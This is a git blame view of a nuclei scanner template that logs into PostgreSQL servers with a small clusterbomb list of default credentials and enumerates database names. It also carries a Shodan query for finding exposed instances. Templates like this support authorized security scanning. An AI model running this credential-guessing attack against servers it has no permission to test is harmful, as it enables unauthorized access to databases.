Files
nuclei-templates/javascript/enumeration/pgsql/pgsql-list-database.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

2024-03-28 01:04:47 +05:30
id: postgresql-list-database
info:
name: PostgreSQL List Database
author: pussycat0x
2024-03-29 13:29:52 +05:30
severity: high
2024-03-28 01:04:47 +05:30
description: |
2024-03-29 13:29:52 +05:30
A single Postgres server process can manage multiple databases at the same time. Each database is stored as a separate set of files in its own directory within the servers data directory.
2024-03-28 01:04:47 +05:30
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
- https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
metadata:
shodan-query: product:"PostgreSQL"
2024-04-01 13:49:09 +05:30
verified: true
2024-03-29 13:29:52 +05:30
tags: js,network,postgresql,authenticated
2024-03-28 01:04:47 +05:30
javascript:
- code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
Export(connected);
2024-03-29 13:29:52 +05:30
2024-03-28 01:04:47 +05:30
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
2024-03-29 13:29:52 +05:30
- admin
2024-03-28 01:04:47 +05:30
password:
- postgres
2024-03-29 13:29:52 +05:30
-
- 123
- amber
database:
- postgres
2024-03-28 01:04:47 +05:30
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[].datname'
# digest: 4a0a0047304502203031b028966e2139f57c1175b753001a3f1e34b0e8997994db3a4f4c6b2696b302210081533ae19bf2ed233488ee86fba7f9d8cae8570ad63fa7a0db828f76d1e01e98:922c64590222798bb761d5b6d8e72950